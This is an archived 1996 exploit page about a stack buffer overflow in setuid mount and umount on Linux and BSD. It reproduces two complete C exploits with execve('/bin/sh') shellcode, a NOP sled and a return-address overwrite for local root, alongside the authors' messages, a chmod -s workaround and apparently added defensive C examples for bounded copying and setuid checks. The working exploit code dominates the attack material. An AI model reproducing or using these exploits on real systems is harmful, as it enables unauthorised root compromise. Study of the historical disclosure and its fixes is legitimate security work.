Linux & *BSD umount holes

Summary
Description: A standard stack buffer overflow exists in the Linux and *BSD umount binaries.
Author: bloodmask (bloodmask@mymail.com) claims to have found the vulnerability. Paulo Jorge Alves Oliveira (pjao@dux.isec.pt) wrote the FreeBSD/Linux exploits that appear first below.
Compromise: root (local)
Vulnerable Systems: Systems with a vulnerable setuid umount (many Linux and BSD distributions)
Date: 13 August 1996
Notes: If mount is fixed, try ncpmount/ncpumount and possibly wuftpd. Another mount exploit is in the addendum.
Details

Exploit:


Paulo Jorge Alves Oliveira (pjao@dux.isec.pt)
Tue, 29 Oct 1996 12:38:52 +0100 

Hello,

  there is a bug in the berkeley-derived umount, which allows an attacker to
get root access (see freebsd-security for details). Here is an exploit for
Linux (tested on 2.0.XX), for BSD (tested on FreeBSD 2.1) and a quick
solution.

Best regards, Paulo

-------------------------------------- linux_umount_exploit.c ----------
#include <stdio.h>      /* header names were lost in extraction; these are the headers the calls below need */
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define PATH_MOUNT "/bin/umount"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

u_long get_esp()
{
  __asm__("movl %esp, %eax");

}

main(int argc, char **argv)
{
  u_char execshell[] =
   "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
   "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
   "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;

   int i;
   int ofs = DEFAULT_OFFSET;

   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memory\n");
      exit(0);
   }
   ptr = buff;

   /* fill start of buffer with nops */

   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);

   /* stick asm code into the buffer */

   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];

   addr_ptr = (long *)ptr;
   for(i=0;i < (8/4);i++)
      *(addr_ptr++) = get_esp() + ofs;
   ptr = (char *)addr_ptr;
   *ptr = 0;

   (void)alarm((u_int)0);
   execl(PATH_MOUNT, "umount", buff, NULL);
}


--------------------------------------------------------------------------

  Here is a little solution --
    chmod -s /bin/umount
 This way only root can run this command.


With best regards, Paulo

--
|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|                        JUST  HAVE  SOME  FUN  IN  THIS                    |
|                                 CRAZY  WORLD                              |
|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
| VIRTUAL PRAXIS -> CIUNIX.UC.PT 3333                                       |
| IRC-PTnet      -> IRC.ISEC.PT, CIUNIX.UC.PT, IRC.RCCN.NET, IRC.UALG.PT    |
| E-MAILs                                                                   |
|   UC DOMAIN :                                                             |
|       pjao@ciunix.uc.pt                                                   |
|       pjao@gemini.ci.uc.pt                                                |
|   ISEC DOMAIN :                                                           |
|       pjao@dux.isec.pt                                                    |
|       ircadm@irc.isec.pt (Administrator of the ISEC IRC server)           |
| WWW                                                                       |
|   http://ciunix.uc.pt/~pjao                                               |
|   http://dux.isec.pt/~pjao                                                |
| TELEPHONES                                                                |
|   ISEC : 039-7000200 Extension 2718                                       |
|   BIP  : 0941-7-193144                                                    |
|___________________________________________________________________________|
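The bug both exploits on this page lean on is a fixed-size stack buffer that a setuid program fills from a command-line argument without checking its length. The C below is an added example, not code from Paulo's post or from the mount/umount sources: it places that unchecked copy next to a bounded copy that rejects arguments which do not fit, and runs the bounded version over constructed argument lengths (8, 1023, 1024 and the 4096 bytes the exploits allocate). The buffer size and the function names are assumptions made for the illustration.

```c
/* Added example (not from the original post): the unchecked copy that makes a
 * setuid program exploitable, next to a bounded copy that refuses over-long
 * arguments. Sizes and inputs are constructed for illustration. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ARG_BUF 1024   /* assumed: a fixed stack buffer for one argument */

/* Vulnerable pattern: the argument is copied without comparing its length to
 * the buffer, so an argument of ARG_BUF bytes or more writes past 'target'
 * and over the saved return address. Never call this with untrusted input;
 * it is only ever fed a short, known-good string here. */
int copy_arg_unchecked(const char *arg)
{
    char target[ARG_BUF];
    strcpy(target, arg);
    return (int)strlen(target);
}

/* Hardened pattern: check before copying. Returns the copied length, or -1
 * when the argument plus its terminator does not fit in 'outlen' bytes. */
int copy_arg_checked(const char *arg, char *out, size_t outlen)
{
    size_t n = strlen(arg);
    if (n >= outlen)          /* no room for the NUL terminator: reject */
        return -1;
    memcpy(out, arg, n + 1);
    return (int)n;
}

/* Convenience wrapper: bounded copy into a buffer of ARG_BUF bytes. */
int checked_copy_result(const char *arg)
{
    char out[ARG_BUF];
    return copy_arg_checked(arg, out, sizeof out);
}

/* Runs the bounded copy over constructed inputs of the given lengths and
 * returns how many were rejected. Inputs live on the heap so that building
 * them cannot itself overflow the stack. Returns -1 on allocation failure. */
int count_rejected(const size_t *lengths, size_t count)
{
    int rejected = 0;
    for (size_t i = 0; i < count; i++) {
        char *arg = malloc(lengths[i] + 1);
        if (!arg)
            return -1;
        memset(arg, 'A', lengths[i]);
        arg[lengths[i]] = '\0';
        if (checked_copy_result(arg) < 0)
            rejected++;
        free(arg);
    }
    return rejected;
}

/* Constructed sample: a normal mount point, the largest argument that fits,
 * the first one that does not, and the 4096-byte size the exploits use. */
int rejected_for_sample(void)
{
    const size_t lengths[] = { 8, ARG_BUF - 1, ARG_BUF, 4096 };
    return count_rejected(lengths, sizeof lengths / sizeof lengths[0]);
}

int main(void)
{
    printf("unchecked copy of \"/mnt/cd\" -> length %d\n", copy_arg_unchecked("/mnt/cd"));
    printf("checked copy of \"/mnt/cd\"   -> %d\n", checked_copy_result("/mnt/cd"));
    printf("rejected %d of 4 constructed arguments\n", rejected_for_sample());
    return 0;
}
```

The only difference between the two copies is the comparison against the buffer size before the write; a length check of that form (or a length-bounded copy followed by explicit truncation handling) is what the later fixes to these binaries amount to, and it costs nothing at run time.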

Addendum:


Greetings,

Well folks, after all the other security issues in Linux, I can't say
I'm really that shocked about this one. Anyway, read the official covin
release. After finding this one, we at covin decided it's time to put
an end to this issue, and we've begun scanning all of Linux's suid
binaries for other hints of these hidden "features". Results will be
released soon. The reason we are also releasing the exploit, an act
which may seem highly irresponsible, is due to previous experience that
making the exploit widely available usually speeds up the process of
patching up stupid vulnerabilities like these.


BTW, this is kind of off topic, but I figure there's nothing wrong
with killing two birds with one stone... I just noticed when installing
the latest version of the shadow suite, taken from sunsite, that it
"unpatched" the lib environment vulnerability on my system. I haven't had
the time to determine *HOW* it exposed my system, but it would be wise
to check up on this matter.

Attachment: cvnmount.exploit

Covin Security Releases:
(mount bufferoverflow exploit v1.0)

Tested operating systems: All current distributions of Linux

Affect: Local users on affected systems can overflow mount's syntax
buffer and execute a shell by overwriting the stack.

Affected binaries:
(/bin/mount and /bin/umount)

Workaround:
On all current distributions of Linux remove suid bit of /bin/mount and
/bin/umount.
[chmod -s /bin/mount;chmod -s /bin/umount]

Remarks:
For god's sake, how many more times are we gonna see this kind of problem?
It's been with Linux since its very beginning, and it's so easy to
exploit. Similar buffer overflow vulnerabilities have been found in
Linux distributions many times before, splitvt and dip, just to name a few
examples.


Any remarks, notes or other forms of feedback may be redirected to:
bloodmask@mymail.com
<------------------------------[ Cut here ]---------------------------------->

/* Mount Exploit for Linux, Jul 30 1996

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::""`````""::::::""`````""::"```":::'"```'.g$$S$' `````````"":::::::::
:::::'.g#S$$"$$S#n. .g#S$$"$$S#n. $$$S#s s#S$$$ $$$$S". $$$$$$"$$S#n.`::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ .g#S$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ gggggg $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::::`S$$$$s$$$$S' `S$$$$s$$$$S' `S$$$$s$$$$S' $$$$$$$ $$$$$$ $$$$$$ ::::::
:::::::...........:::...........:::...........::.......:......:.......::::::
:::::::::::::::::::::::::::::::::::::::::::::::;::::::::::::::::::::::::::::

Discovered and Coded by Bloodmask & Vio
Covin Security 1996
*/

#include <stdio.h>      /* header names were lost in extraction; these are the headers the calls below need */
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define PATH_MOUNT "/bin/umount"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

u_long get_esp()
{
  __asm__("movl %esp, %eax");

}

main(int argc, char **argv)
{
  u_char execshell[] =
   "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
   "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
   "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;

   int i;
   int ofs = DEFAULT_OFFSET;

   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memory\n");
      exit(0);
   }
   ptr = buff;

   /* fill start of buffer with nops */

   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);

   /* stick asm code into the buffer */

   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];

   addr_ptr = (long *)ptr;
   for(i=0;i < (8/4);i++)
      *(addr_ptr++) = get_esp() + ofs;
   ptr = (char *)addr_ptr;
   *ptr = 0;

   (void)alarm((u_int)0);
   printf("Discovered and Coded by Bloodmask and Vio, Covin 1996\n");
   execl(PATH_MOUNT, "mount", buff, NULL);
}

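Both messages give the same workaround, chmod -s on /bin/mount and /bin/umount, and the covin note says they are scanning the system's setuid binaries. The program below is an added example, not part of the advisory or of either exploit: it reports whether a path carries the setuid bit using stat(2), applies the workaround with chmod(2) while keeping every other permission bit, and proves the round trip on a constructed temporary file that it owns. The path names are the ones the advisory gives; the temp-file name and the helper names are assumptions.

```c
/* Added example (not from the advisory): check for the setuid bit and apply
 * the advisory's workaround (chmod -s) with stat(2)/chmod(2). The temp-file
 * round trip is constructed so the code can check itself without root. */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>

/* 1 if path is a regular file with the setuid bit set, 0 if not,
 * -1 if the path cannot be stat'ed (absent, or no permission). */
int is_setuid_file(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return -1;
    if (!S_ISREG(st.st_mode))
        return 0;
    return (st.st_mode & S_ISUID) ? 1 : 0;
}

/* The workaround from the advisory: clear setuid and setgid, keep all other
 * permission bits. Returns 0 on success, -1 on error. Clearing the bit on
 * the real binaries needs root; on a file you own it needs nothing. */
int strip_setuid(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return -1;
    mode_t mode = (st.st_mode & 07777) & ~(mode_t)(S_ISUID | S_ISGID);
    return chmod(path, mode) == 0 ? 0 : -1;
}

/* Self-check on a constructed temp file owned by the caller: set the bit,
 * confirm it is reported, strip it, confirm it is gone. Returns 0 when every
 * step behaved as expected, otherwise the number of the step that failed. */
int setuid_roundtrip_demo(void)
{
    char path[] = "/tmp/setuid_demo_XXXXXX";   /* constructed template name */
    int fd = mkstemp(path);
    int step = 0;
    if (fd < 0)
        return 1;
    close(fd);
    if (chmod(path, 0644) != 0 || is_setuid_file(path) != 0)
        step = 2;
    else if (chmod(path, 04755) != 0 || is_setuid_file(path) != 1)
        step = 3;
    else if (strip_setuid(path) != 0 || is_setuid_file(path) != 0)
        step = 4;
    unlink(path);
    return step;
}

int main(void)
{
    /* the two binaries named in the advisory's workaround */
    const char *paths[] = { "/bin/mount", "/bin/umount" };
    for (size_t i = 0; i < sizeof paths / sizeof paths[0]; i++) {
        int r = is_setuid_file(paths[i]);
        printf("%-12s %s\n", paths[i],
               r < 0 ? "not present" :
               r ? "setuid (check the version; chmod -s if unpatched)" : "not setuid");
    }
    printf("round trip on a temp file: %s\n",
           setuid_roundtrip_demo() == 0 ? "ok" : "failed");
    return 0;
}
```

Run it as any user to read the bits. On a current system /bin/mount is expected to be setuid and long since patched, so a "setuid" line is a prompt to check the package version rather than a verdict; the strip step is there to show exactly what the advisory's chmod -s changes and what it leaves alone.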


This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap.